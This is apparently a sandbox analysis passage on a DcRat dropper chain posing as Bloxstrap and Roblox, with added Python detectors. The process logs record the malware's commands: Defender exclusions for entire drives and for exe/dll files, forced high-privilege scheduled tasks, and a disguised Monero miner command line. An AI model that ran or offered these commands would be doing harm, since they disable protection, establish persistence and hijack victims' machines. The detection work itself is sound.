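    scope: str      # file, directory, drive-root, extension, or an ENV_SCOPE value
    severity: str   # "high" for a single file, "critical" for anything broader


def _read_arg(s: str, i: int) -> str:
    """Return the PowerShell argument starting at s[i]: a balanced @( ... )
    array literal, a quoted string, or a bare token."""
    while i < len(s) and s[i].isspace():
        i += 1
    if s.startswith("@(", i):
        depth = 0
        for j in range(i, len(s)):
            if s[j] == "(":
                depth += 1
            elif s[j] == ")":
                depth -= 1
                if depth == 0:
                    return s[i:j + 1]
        return s[i:]
    if i < len(s) and s[i] in "'\"":
        j = s.find(s[i], i + 1)
        return s[i:j + 1] if j != -1 else s[i:]
    j = i
    while j < len(s) and not s[j].isspace():
        j += 1
    return s[i:j]


def _items(arg: str) -> list:
    """Split '@(a, b)' or a single quoted value into bare items."""
    if arg.startswith("@(") and arg.endswith(")"):
        arg = arg[2:-1]
    return [a.strip().strip("'\"") for a in arg.split(",") if a.strip()]


def _scope(value: str) -> str:
    key = value.lower()
    if key in ENV_SCOPE:
        return ENV_SCOPE[key]
    if key.startswith("$env:"):
        return "env-var"            # unknown variable, still a whole directory
    if DRIVE_ROOT.match(value):
        return "drive-root"
    if value.endswith(("/", "\\")) or not FILE_EXT.search(value):
        return "directory"
    return "file"


def analyze(cmdline: str) -> list:
    """Return one Finding per excluded path or extension in cmdline."""
    if not re.search(r"\b(Add|Set)-MpPreference\b", cmdline, re.I):
        return []
    findings = []
    for m in PARAM.finditer(cmdline):
        for value in _items(_read_arg(cmdline, m.end())):
            if m.group(1).lower() == "extension":
                findings.append(Finding("extension", value, "extension", "critical"))
            else:
                scope = _scope(value)
                findings.append(Finding("path", value, scope,
                                        "high" if scope == "file" else "critical"))
    return findings


# Constructed from this report's process tree.
SAMPLE_CMDLINES = [
    "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe'",
    "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/'",
    "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'",
    "powershell -Command \"Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,"
    "$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force\"",
    "powershell -Command \"Add-MpPreference -ExclusionExtension @('exe','dll') -Force\"",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for f in analyze(line):
            print(f"{f.severity:8} {f.kind:9} {f.scope:13} {f.value}")
```

On a suspect host, `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` (and the same for `ExclusionExtension`) shows what was added and `Remove-MpPreference -ExclusionPath <path>` reverts it. Each change is also written as Event ID 5007 to the Microsoft-Windows-Windows Defender/Operational log, which is a cleaner detection source than command-line parsing when that log is being collected.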
[depth 3] C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
    signatures: Checks computer location settings; Executes dropped EXE; Modifies registry class; Suspicious use of WriteProcessMemory
    PID: 4140

[depth 4] C:\Windows\SysWOW64\WScript.exe
    cmdline: "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
    signatures: Checks computer location settings
    PID: 1452

[depth 5] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
    PID: 5408

[depth 6] C:\winNet\ComContainerbrowserRefRuntime.exe
    cmdline: "C:\winNet/ComContainerbrowserRefRuntime.exe"
    signatures: Checks computer location settings; Executes dropped EXE; Loads dropped DLL; Drops file in Program Files directory; Modifies registry class
    PID: 2556

[depth 7] C:\Windows\System32\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wXWS1pp4ya.bat"
    PID: 6096

[depth 8] C:\Windows\system32\chcp.com
    cmdline: chcp 65001
    PID: 5228

[depth 8] C:\Windows\system32\PING.EXE
    cmdline: ping -n 10 localhost
    signatures: Runs ping.exe
    PID: 5772

[depth 8] C:\Recovery\WindowsRE\RuntimeBroker.exe
    cmdline: "C:\Recovery\WindowsRE\RuntimeBroker.exe"
    signatures: Executes dropped EXE
    PID: 5564
[depth 3] C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
    signatures: Executes dropped EXE
    PID: 392

[depth 4] C:\Windows\System32\conhost.exe
    cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
    PID: 6600

[depth 5] C:\Windows\System32\cmd.exe
    cmdline: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    PID: 6648

[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    signatures: Command and Scripting Interpreter: PowerShell
    PID: 6700

[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    signatures: Command and Scripting Interpreter: PowerShell
    PID: 7124

[depth 5] C:\Windows\System32\cmd.exe
    cmdline: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
    PID: 6724

[depth 6] C:\Windows\system32\schtasks.exe
    cmdline: schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
    PID: 6832

[depth 5] C:\Windows\System32\cmd.exe
    cmdline: "cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
    PID: 6276

[depth 6] C:\Windows\System32\Conhost.exe
    cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    PID: 6136

[depth 6] C:\Users\Admin\Bloxstrap.exe
    cmdline: C:\Users\Admin\Bloxstrap.exe
    signatures: Executes dropped EXE
    PID: 7056

[depth 7] C:\Windows\System32\conhost.exe
    cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
    PID: 1532

[depth 8] C:\Windows\System32\cmd.exe
    cmdline: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    PID: 1312

[depth 9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    signatures: Command and Scripting Interpreter: PowerShell
    PID: 7060

[depth 9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    signatures: Command and Scripting Interpreter: PowerShell
    PID: 4364

[depth 8] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    PID: 3532

[depth 9] C:\Windows\System32\conhost.exe
    cmdline: "C:\Windows\System32\conhost.exe" "/sihost64"
    PID: 6556

[depth 8] C:\Windows\explorer.exe
    cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
    PID: 5772
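The last child in the Bloxstrap tree is explorer.exe started with an XMRig-style argument list: a RandomX algorithm, a pool URL, a 95-character Monero address as the user, and a set of --cinit-* switches that stock XMRig does not define. The Python below is an added example, not code from this report, from XMRig or from the sample. It parses that command line (copied from the tree as a constructed sample) into a record and lists the reasons an analyst would escalate it. The STOCK_OPTS and SYSTEM_IMAGES sets are the example's own choices, not anything the report states, and the --cinit-stealth-targets value is treated as an opaque blob because the report gives no way to decode it.

```python
"""Parse an XMRig-style miner command line into a structured record and
list the reasons it should be escalated.

Added example, not code from the sandbox report, from XMRig or from the
sample. MINER_IMAGE and MINER_CMDLINE are constructed by copying the
explorer.exe entry from this report's process tree.
"""
import re

# Standard Monero address: '4' followed by 94 base58 characters.
MONERO_ADDR = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")

# Long options stock XMRig documents (only those used on this command line
# are listed). Anything else, in particular --cinit-*, is not a stock option
# and marks a customised build. Assumption made for this example.
STOCK_OPTS = {
    "algo", "url", "user", "pass", "tls", "asm", "cpu-max-threads-hint",
    "cpu-memory-pool", "randomx-mode", "randomx-no-rdmsr",
    "cuda-bfactor-hint", "cuda-bsleep-hint",
}
# Windows images that have no business carrying miner arguments.
SYSTEM_IMAGES = {"explorer.exe", "conhost.exe", "svchost.exe", "dllhost.exe", "runtimebroker.exe"}

# Constructed sample: the explorer.exe entry from this report.
MINER_IMAGE = r"C:\Windows\explorer.exe"
MINER_CMDLINE = (
    r'C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto '
    r'--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr '
    r'--cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 '
    r'--user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK '
    r'--pass=x --cpu-max-threads-hint=30 '
    r'--cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" '
    r'--cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth'
)


def _tokens(cmdline):
    """Windows-style split: whitespace separates, double quotes group,
    backslashes are literal (unlike shlex in POSIX mode)."""
    return [t.replace('"', "") for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]


def parse_miner_cmdline(image, cmdline):
    """Return a record with pool, wallet, TLS flag, raw options and the
    options that are not stock XMRig."""
    toks = _tokens(cmdline)
    opts = {}
    for t in toks[1:]:
        if t.startswith("--"):
            key, _, val = t[2:].partition("=")
            opts[key] = val if val else True      # bare flag -> True
    rec = {"image": image, "options": opts, "pool": None, "wallet": None}
    url = opts.get("url")
    if isinstance(url, str):
        host, _, port = url.rpartition(":")
        rec["pool"] = (host, int(port)) if host and port.isdigit() else (url, None)
    user = opts.get("user")
    if isinstance(user, str):
        rec["wallet"] = user
    rec["wallet_is_monero"] = bool(rec["wallet"] and MONERO_ADDR.match(rec["wallet"]))
    rec["tls"] = opts.get("tls") is True
    rec["custom_opts"] = sorted(k for k in opts if k not in STOCK_OPTS)
    return rec


def assess(rec):
    """Human-readable reasons this record looks like a hosted miner."""
    reasons = []
    if rec["pool"] and rec["wallet_is_monero"]:
        host, port = rec["pool"]
        reasons.append(f"mines to {host}:{port} with a Monero wallet{' over TLS' if rec['tls'] else ''}")
    algo = rec["options"].get("algo")
    if isinstance(algo, str) and algo.startswith("rx/"):
        reasons.append("RandomX CPU algorithm selected")
    if rec["custom_opts"]:
        reasons.append("non-stock XMRig options: " + ", ".join(rec["custom_opts"]))
    threads = rec["options"].get("cpu-max-threads-hint")
    idle = rec["options"].get("cinit-idle-cpu")
    if threads or idle:
        reasons.append(f"throttled to stay unnoticed (cpu-max-threads-hint={threads}, cinit-idle-cpu={idle})")
    name = rec["image"].rsplit("\\", 1)[-1].lower()
    if name in SYSTEM_IMAGES:
        reasons.append(f"miner arguments carried by a Windows system image ({name})")
    return reasons


if __name__ == "__main__":
    rec = parse_miner_cmdline(MINER_IMAGE, MINER_CMDLINE)
    print("pool:", rec["pool"], "wallet:", rec["wallet"][:8] + "...", "tls:", rec["tls"])
    for r in assess(rec):
        print(" -", r)
```

The pool, wallet and thread cap are the fields worth pivoting on (the same wallet will recur across unrelated samples), and the presence of any --cinit-* option is itself a signature, since a stock XMRig build would reject those switches.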
[depth 3] C:\Users\Admin\AppData\Local\Temp\Frage build.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
    signatures: Checks computer location settings; Executes dropped EXE; Modifies registry class; Suspicious use of WriteProcessMemory
    PID: 1660

[depth 4] C:\Windows\SysWOW64\WScript.exe
    cmdline: "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
    signatures: Checks computer location settings
    PID: 904

[depth 5] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
    PID: 5476

[depth 6] C:\DriversavessessionDlldhcp\Roblox.exe
    cmdline: "C:\DriversavessessionDlldhcp/Roblox.exe"
    signatures: Modifies WinLogon for persistence; Checks computer location settings; Executes dropped EXE; Loads dropped DLL; Adds Run key to start application; Modifies registry class
    PID: 5428

[depth 7] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (sixteen instances, each with one [depth 8] cvtres.exe child)
    csc cmdline:    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\<name>\<name>.cmdline"
    cvtres cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\<RES>.tmp" "<CSC .TMP path>"

    <name>   | csc PID | csc signatures                                        | <RES>.tmp   | <CSC .TMP path>                                                                          | cvtres PID
    yuwvmi3t | 6404    | Loads dropped DLL                                     | RES470.tmp  | c:\Recovery\WindowsRE\CSCC7783D3289374321A5F2785D92A2CEE9.TMP                            | 5100
    camgvsp2 | 6136    | Loads dropped DLL; Drops file in Program Files directory | RES5D7.tmp  | c:\Program Files (x86)\Microsoft.NET\RedistList\CSC7A0F739559C14E76B9FCB2905B968626.TMP   | 5904
    dqs4vyuy | 1508    | Loads dropped DLL                                     | RES6B2.tmp  | c:\Recovery\WindowsRE\CSC9D15F18DF25B4EBC9AFC5D7EFCDC912E.TMP                            | 5632
    unbjjxr2 | 3396    | Loads dropped DLL; Drops file in Windows directory    | RES73E.tmp  | c:\Windows\Vss\Writers\Application\CSC1695FE976BC94F94849813BF48BB424.TMP                | 5840
    wo0r4xno | 6300    | Loads dropped DLL; Drops file in Windows directory    | RES867.tmp  | c:\Windows\SKB\LanguageModels\CSCF579D11E63E4D1AA25EA79FCBFF6CC.TMP                      | 5876
    avbd4xd1 | 5816    | Loads dropped DLL; Drops file in Program Files directory | RES961.tmp  | c:\Program Files\WindowsPowerShell\CSCBA97CDFE29334993A62C13D44C919133.TMP                | 376
    hwun14pc | 5884    | Loads dropped DLL; Drops file in Program Files directory | RESA6B.tmp  | c:\Program Files\Uninstall Information\CSC7DE149071344984BABDF789467E5B10.TMP             | 6312
    zdiymwed | 1312    | Loads dropped DLL; Drops file in Program Files directory | RESB65.tmp  | c:\Program Files (x86)\Internet Explorer\ja-JP\CSC7EF3102F42B4454780319C960827883.TMP     | 6608
    2pkbp2db | 6800    | Loads dropped DLL                                     | RESC30.tmp  | c:\Users\Default\Pictures\CSC153B9179EE0B46AA9D569016ABEAE6.TMP                          | 6904
    2jgjupzb | 6976    | Loads dropped DLL                                     | RESEC0.tmp  | c:\Recovery\WindowsRE\CSC6D4CDB6BEEFF47A79AD646A942B52992.TMP                            | 6844
    2mua0gou | 6964    | Loads dropped DLL                                     | RES10A5.tmp | c:\Users\All Users\Documents\CSC84F997DF90245D3B8FB2CA93EAEE763.TMP                      | 7068
    3fqzhcs1 | 7088    | Loads dropped DLL                                     | RES11CE.tmp | c:\DriversavessessionDlldhcp\CSC3597879E6DB949CA948CF8F65C6C1C2B.TMP                      | 6820
    cqtzcw4y | 7116    | Loads dropped DLL                                     | RES12A8.tmp | c:\winNet\CSC35AC1482CA674AE5A4682B0E9D49A28.TMP                                          | 6344
    yuwg5pdy | 5684    | Loads dropped DLL                                     | RES13C2.tmp | c:\DriversavessessionDlldhcp\CSC91E33477D10D4389B8D462A4608C15A1.TMP                      | 5936
    a1si3ueb | 3336    | Loads dropped DLL                                     | RES144E.tmp | c:\Users\Admin\Music\CSCE81E5B3D68EC4E5A97015F99F63D030.TMP                              | 1552
    b5otnzkc | 6652    | Loads dropped DLL; Drops file in System32 directory   | RES1596.tmp | c:\Windows\System32\CSC9923422659A044C39A5D951F6C4B4A87.TMP                              | 3944

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (fifteen instances, one per exclusion)
    cmdline: "powershell" -Command Add-MpPreference -ExclusionPath '<excluded path>'
    signatures (each instance): Command and Scripting Interpreter: PowerShell

    PID  | excluded path
    5912 | C:/
    5928 | C:/$Recycle.Bin/
    5744 | C:/Documents and Settings/
    5728 | C:/DriversavessessionDlldhcp/
    3616 | C:/PerfLogs/
    3116 | C:/Program Files/
    5412 | C:/Program Files (x86)/
    6232 | C:/ProgramData/
    5952 | C:/Recovery/
    2700 | C:/System Volume Information/
    1852 | C:/Users/
    5856 | C:/Windows/
    2812 | C:/winNet/
    4172 | C:\Users\Admin\AppData\Local\TrustedInstaller.exe
    5444 | C:\DriversavessessionDlldhcp\Roblox.exe

[depth 7] C:\Windows\System32\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tvn8rY4Wma.bat"
    PID: 5464

[depth 8] C:\Windows\system32\chcp.com
    cmdline: chcp 65001
    PID: 6800

[depth 8] C:\Windows\system32\w32tm.exe
    cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    PID: 6692

[depth 8] C:\Users\Admin\AppData\Local\TrustedInstaller.exe
    cmdline: "C:\Users\Admin\AppData\Local\TrustedInstaller.exe"
    signatures: Executes dropped EXE
    PID: 6300
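Two schtasks patterns appear in this report: the Bloxstrap tree registers an onlogon task with /rl highest, and the faildsfsdf.exe tree that follows repeats `schtasks /create /f /sc minute /mo -1 ...` dozens of times alongside one `/mo 5` task and one onlogon task. The Python below is an added example, not code from this report or from the sample. It parses such invocations (copied from this page as constructed samples) and flags the run level, the trigger, the action path and an out-of-range modifier; the modifier ranges are the ones documented for schtasks.exe, and the user-writable path pattern is the example's own heuristic.

```python
"""Parse schtasks /create invocations and flag the persistence traits seen
in this report.

Added example, not code from the sandbox report or from the sample.
SAMPLE_LINES are constructed by copying schtasks command lines from this
tree; MODIFIER_RANGE holds the /mo ranges documented for schtasks.exe.
"""
import re
from typing import Optional

# Documented /MO ranges for the schedule types that take a numeric modifier.
MODIFIER_RANGE = {"minute": (1, 1439), "hourly": (1, 23), "daily": (1, 365), "weekly": (1, 52)}
# Switches that consume the following token as their value.
VALUE_OPTS = {"/sc", "/mo", "/tn", "/tr", "/rl", "/ru", "/rp", "/st", "/sd", "/ed", "/du", "/ri"}
# Heuristic for "a place an unprivileged user can write to".
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\|\\appdata\\|\\temp\\|\\programdata\\", re.I)

# Constructed samples copied from this report's process tree.
SAMPLE_LINES = [
    r'"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"',
    r'"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" & exit',
    r'"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit',
    r'SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST',
]


def _tokens(cmdline):
    """Windows-style split: whitespace separates, double quotes group,
    backslashes are literal."""
    return [t.replace('"', "") for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]


def parse_schtasks(cmdline) -> Optional[dict]:
    """Return {'create', 'force', 'opts'} for the schtasks command inside
    cmdline (which may be wrapped in cmd /c ... & exit), or None."""
    toks = _tokens(cmdline)
    start = next((i for i, t in enumerate(toks)
                  if t.lower().rsplit("\\", 1)[-1] in ("schtasks", "schtasks.exe")), None)
    if start is None:
        return None
    rec = {"create": False, "force": False, "opts": {}}
    i = start + 1
    while i < len(toks):
        t = toks[i].lower()
        if t in ("&", "&&", "|"):          # end of this command in a cmd chain
            break
        if t == "/create":
            rec["create"] = True
        elif t == "/f":
            rec["force"] = True
        elif t in VALUE_OPTS and i + 1 < len(toks):
            rec["opts"][t[1:]] = toks[i + 1]   # switches are case-insensitive, values kept verbatim
            i += 1
        i += 1
    return rec


def assess(rec) -> list:
    """Reasons a parsed /create call merits attention."""
    if not rec["create"]:
        return []
    o, findings = rec["opts"], []
    sc = o.get("sc", "").lower()
    if sc == "onlogon":
        findings.append("persistence: task runs at every logon")
    if o.get("rl", "").lower() == "highest":
        findings.append("runs with highest available privileges")
    if sc in MODIFIER_RANGE and "mo" in o:
        lo, hi = MODIFIER_RANGE[sc]
        mo = int(o["mo"]) if re.fullmatch(r"-?\d+", o["mo"]) else None
        if mo is None or not lo <= mo <= hi:
            findings.append(f"/mo {o['mo']} is outside the documented {lo}-{hi} range for /sc {sc}; schtasks should reject it")
        else:
            findings.append(f"persistence: re-runs every {mo} {sc}(s)")
    tr = o.get("tr", "")
    if USER_WRITABLE.search(tr):
        findings.append(f"action in a user-writable path: {tr}")
    if rec["force"]:
        findings.append("/f overwrites any existing task with this name without prompting")
    return findings


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        rec = parse_schtasks(line)
        print(rec["opts"].get("tn"), "->", rec["opts"].get("tr"))
        for f in assess(rec):
            print("   ", f)
```

`/mo -1` is outside the documented range for a minute schedule, which is consistent with (though the report does not state) the command failing and the sample retrying it, and would explain why that one task is attempted so many times while the `/mo 5` task appears once. On a live host, `schtasks /query /fo LIST /v` or `Get-ScheduledTask | Where-Object { $_.Principal.RunLevel -eq 'Highest' }` shows which of these registrations actually succeeded.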
[depth 2] C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe"
    signatures: Modifies WinLogon for persistence; Executes dropped EXE; Adds Run key to start application; Drops file in Windows directory; Suspicious use of AdjustPrivilegeToken
    PID: 2568

[depth 3] C:\Windows\SYSTEM32\CMD.exe
    cmdline: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" & exit
    PID: 6760

[depth 4] C:\Windows\system32\schtasks.exe
    cmdline: SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe"
    signatures: Scheduled Task/Job: Scheduled Task
    PID: 6944

[depth 3] C:\Windows\SYSTEM32\CMD.exe, 29 further instances, each spawning one [depth 4] C:\Windows\system32\schtasks.exe
    cmd cmdline:      "CMD" /c SchTaSKs /create /f /sc minute /mo <mo> /tn "<task name>" /tr "<action>" /RL HIGHEST & exit
    schtasks cmdline: SchTaSKs /create /f /sc minute /mo <mo> /tn "<task name>" /tr "<action>" /RL HIGHEST
    action A = C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe
    action B = C:\Users\Admin\Music\xdwdAdobe Illustrator.exe

    cmd PID | schtasks PID | /mo | <task name>          | <action> | schtasks signatures
    7000    | 7060         | -1  | Avid Pro Tools       | A        | DcRat
    5268    | 688          | 5   | Google Chrome Update | B        | DcRat
    6028    | 400          | -1  | Avid Pro Tools       | A        | Scheduled Task/Job: Scheduled Task
    5968    | 5176         | -1  | Avid Pro Tools       | A        | Scheduled Task/Job: Scheduled Task
    6460    | 2472         | -1  | Avid Pro Tools       | A        | DcRat
    5440    | 5736         | -1  | Avid Pro Tools       | A        | Scheduled Task/Job: Scheduled Task
    4660    | 3916         | -1  | Avid Pro Tools       | A        | DcRat; Scheduled Task/Job: Scheduled Task
    6672    | 5740         | -1  | Avid Pro Tools       | A        | (none)
    5812    | 116          | -1  | Avid Pro Tools       | A        | DcRat
    6264    | 6424         | -1  | Avid Pro Tools       | A        | Scheduled Task/Job: Scheduled Task
    2912    | 6232         | -1  | Avid Pro Tools       | A        | DcRat
    4532    | 4468         | -1  | Avid Pro Tools       | A        | DcRat
    6756    | 6448         | -1  | Avid Pro Tools       | A        | (none)
    3460    | 2348         | -1  | Avid Pro Tools       | A        | (none)
    6628    | 2948         | -1  | Avid Pro Tools       | A        | DcRat
    2872    | 2384         | -1  | Avid Pro Tools       | A        | DcRat
    1788    | 6968         | -1  | Avid Pro Tools       | A        | (none)
    5092    | 6116         | -1  | Avid Pro Tools       | A        | DcRat
    4088    | 1508         | -1  | Avid Pro Tools       | A        | DcRat; Scheduled Task/Job: Scheduled Task
    2804    | 2472         | -1  | Avid Pro Tools       | A        | DcRat
    3860    | 4532         | -1  | Avid Pro Tools       | A        | DcRat
    6168    | 7112         | -1  | Avid Pro Tools       | A        | DcRat; Scheduled Task/Job: Scheduled Task
    5408    | 6252         | -1  | Avid Pro Tools       | A        | DcRat; Scheduled Task/Job: Scheduled Task
    1660    | 6996         | -1  | Avid Pro Tools       | A        | DcRat; Scheduled Task/Job: Scheduled Task
    5652    | 2932         | -1  | Avid Pro Tools       | A        | (none)
    5780    | 4176         | -1  | Avid Pro Tools       | A        | DcRat
    3312    | 6268         | -1  | Avid Pro Tools       | A        | (none)
    3772    | 376          | -1  | Avid Pro Tools       | A        | DcRat; Scheduled Task/Job: Scheduled Task
    6740    | 2728         | -1  | Avid Pro Tools       | A        | DcRat; Scheduled Task/Job: Scheduled Task
    2112    | (cut off)    | -1  | Avid Pro Tools       | A        | DcRat; Scheduled Task/Job: Scheduled Task
PID:5428
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6328
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:6232
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5760
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6560
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4340
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:6188
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1992
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:5824
-
-
-
